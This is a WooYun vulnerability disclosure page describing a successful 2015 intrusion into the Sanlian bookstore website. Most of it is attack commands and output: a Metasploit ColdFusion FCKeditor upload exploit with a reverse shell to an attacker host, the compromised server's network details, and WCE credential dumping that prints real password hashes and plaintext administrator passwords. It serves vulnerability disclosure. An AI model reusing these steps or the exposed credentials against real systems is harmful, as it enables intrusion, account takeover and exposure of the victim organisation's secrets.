当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093090

漏洞标题:三联书店成功入侵事件

相关厂商:北京云因信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-01-21 19:08

修复时间:2015-03-07 19:10

公开时间:2015-03-07 19:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

三联书店www.sdxjpc.com成功入侵事件

详细说明:

1#扫目录成功扫描到fck路径

http://www.sdxjpc.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm


2#在msf搜索coldfusion找到相应的fck利用程序

msf > search coldfusion
exploit/windows/http/coldfusion_fckeditor           2009-07-03       excellent  ColdFusion 8.0.1 Arbitrary File Upload and Execute


设置相应参数

msf > use exploit/windows/http/coldfusion_fckeditor
sf exploit(coldfusion_fckeditor) > set RHOST www.sdxjpc.com
msf exploit(coldfusion_fckeditor) > set payload generic/shell_reverse_tcp
msf exploit(coldfusion_fckeditor) > set LHOST XX.XX.XX.XX
msf exploit(coldfusion_fckeditor) > set LPORT 8888


运行payload
msf exploit(coldfusion_fckeditor) > run
[*] Started reverse handler on XX.XX.XX.XX:8888
[*] Sending our POST request...
[*] Upload succeeded! Executing payload...
[*] Command shell session 2 opened (XX.XX.XX.XX:8888 -> 119.40.39.235:4975) at 2015-01-21 10:56:39 +0800
Microsoft Windows XP [�汾 5.2.3790]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
d:\ColdFusion8\runtime\bin>ver
ver
Microsoft Windows XP [�汾 5.2.3790]
</code>
执行其他命令

d:\ColdFusion8\runtime\bin>ipconfig /all
ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : sdxjpc
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter ��������:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : BCM5703 Gigabit Ethernet
   Physical Address. . . . . . . . . : 00-0E-7F-AF-2F-C2
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 119.40.39.235
   Subnet Mask . . . . . . . . . . . : 255.255.255.248
   Default Gateway . . . . . . . . . : 119.40.39.233
   DNS Servers . . . . . . . . . . . : 202.106.0.20
                                       202.106.196.115
d:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system
d:\ColdFusion8\runtime\bin>netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:818            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1033           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1521           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2030           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2100           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2522           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2930           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3339           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6085           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7778           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7999           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8228           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:51800          0.0.0.0:0              LISTENING
  TCP    119.40.39.235:80       58.241.44.230:42268    ESTABLISHED
  TCP    119.40.39.235:80       58.241.44.230:42269    ESTABLISHED
  TCP    119.40.39.235:80       58.241.44.230:42273    ESTABLISHED
  TCP    119.40.39.235:80       58.241.44.230:42275    ESTABLISHED
  TCP    119.40.39.235:80       58.241.44.230:42281    ESTABLISHED
  TCP    119.40.39.235:80       58.241.44.230:42286    ESTABLISHED
  TCP    119.40.39.235:80       60.179.37.138:51331    ESTABLISHED
  TCP    119.40.39.235:80       61.181.252.6:1926      TIME_WAIT
  TCP    119.40.39.235:80       61.181.252.6:1931      ESTABLISHED
  TCP    119.40.39.235:80       61.181.252.6:1936      TIME_WAIT
  TCP    119.40.39.235:80       61.181.252.6:1937      ESTABLISHED
  TCP    119.40.39.235:80       101.226.168.237:16189  TIME_WAIT
  TCP    119.40.39.235:80       124.115.230.60:4327    ESTABLISHED
  TCP    119.40.39.235:80       171.12.108.172:61462   TIME_WAIT
  TCP    119.40.39.235:80       192.235.78.36:39219    TIME_WAIT
  TCP    119.40.39.235:80       192.235.78.36:53757    FIN_WAIT_2
  TCP    119.40.39.235:80       192.235.78.36:60080    FIN_WAIT_2
  TCP    119.40.39.235:80       192.235.78.36:60721    TIME_WAIT
  TCP    119.40.39.235:80       218.22.116.68:50176    ESTABLISHED
  TCP    119.40.39.235:80       218.30.103.81:34292    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63414    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63416    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63417    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63492    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63493    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63500    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63508    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63510    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63511    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63545    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63665    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63673    TIME_WAIT
  TCP    119.40.39.235:80       222.73.51.225:63674    ESTABLISHED
  TCP    119.40.39.235:80       222.73.51.225:63682    ESTABLISHED
  TCP    119.40.39.235:80       222.73.51.225:63683    ESTABLISHED
  TCP    119.40.39.235:80       222.73.51.225:63684    ESTABLISHED
  TCP    119.40.39.235:80       222.187.46.193:56742   TIME_WAIT
  TCP    119.40.39.235:80       222.187.46.193:56743   ESTABLISHED
  TCP    119.40.39.235:80       222.187.46.193:56748   TIME_WAIT
  TCP    119.40.39.235:80       222.187.46.193:56756   TIME_WAIT
  TCP    119.40.39.235:139      0.0.0.0:0              LISTENING
  TCP    119.40.39.235:1035     119.40.39.235:1521     ESTABLISHED
  TCP    119.40.39.235:1059     119.40.39.235:1060     ESTABLISHED
  TCP    119.40.39.235:1060     119.40.39.235:1059     ESTABLISHED
  TCP    119.40.39.235:1061     192.235.78.36:6666     ESTABLISHED
  TCP    119.40.39.235:1521     119.40.39.235:1035     ESTABLISHED
  TCP    119.40.39.235:3389     218.57.128.242:49751   ESTABLISHED
  TCP    119.40.39.235:4958     192.168.0.49:1521      TIME_WAIT
  TCP    119.40.39.235:4972     192.168.0.49:1521      TIME_WAIT
  TCP    119.40.39.235:4975     192.235.78.36:8888     TIME_WAIT
  TCP    127.0.0.1:1029         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1029         127.0.0.1:1026         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1028         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1032         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1037         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1039         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1041         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1043         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1045         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1047         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1049         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1051         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1054         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1057         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1059         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1063         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1065         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1067         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1069         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1071         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1073         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1075         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1077         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1081         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1083         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1088         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:1090         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4966         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4968         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4974         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4977         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4979         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4981         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4983         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4985         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4987         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4989         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4991         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4993         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4995         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4997         TIME_WAIT
  TCP    127.0.0.1:1029         127.0.0.1:4999         TIME_WAIT
  TCP    127.0.0.1:1031         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1031         127.0.0.1:1027         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1030         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1036         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1038         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1040         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1042         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1044         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1046         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1048         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1050         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1056         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1058         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1062         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1064         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1066         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1068         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1070         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1072         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1074         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1076         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1078         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1080         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1082         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1085         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1087         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:1089         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4965         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4967         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4970         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4973         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4976         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4978         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4980         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4982         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4984         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4986         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4988         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4990         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4992         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4994         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4996         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:4998         TIME_WAIT
  TCP    127.0.0.1:1031         127.0.0.1:5000         TIME_WAIT
  TCP    127.0.0.1:1052         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1084         127.0.0.1:1521         ESTABLISHED
  TCP    127.0.0.1:1521         127.0.0.1:1084         ESTABLISHED
  TCP    127.0.0.1:4164         127.0.0.1:51800        ESTABLISHED
  TCP    127.0.0.1:4607         127.0.0.1:51800        ESTABLISHED
  TCP    127.0.0.1:51800        127.0.0.1:4164         ESTABLISHED
  TCP    127.0.0.1:51800        127.0.0.1:4607         ESTABLISHED
  UDP    0.0.0.0:445            *:*                    
  UDP    119.40.39.235:123      *:*                    
  UDP    119.40.39.235:137      *:*                    
  UDP    119.40.39.235:138      *:*                    
  UDP    127.0.0.1:123          *:*


抓hash密码

C:\>wce.txt -l
wce.txt -l
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator:SDXJPC:00000000000000000000000000000000:B2411B80DB1D162892FCCBC5A5B9C039
SDXJPC$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
IUSR_SDXJPC:SDXJPC:A0003396A423039D97A6AF467D7DC765:E8A716FA9DABF64213E263D12831E7ED
C:\>wce.txt -w
wce.txt -w
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator\SDXJPC:sdxdatabase@fhqs
SDXJPC$\WORKGROUP:
IUSR_SDXJPC\SDXJPC:&y5E=G=P63wB9m


漏洞证明:

1.jpg


2.jpg


修复方案:

FCK编辑器设置权限

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论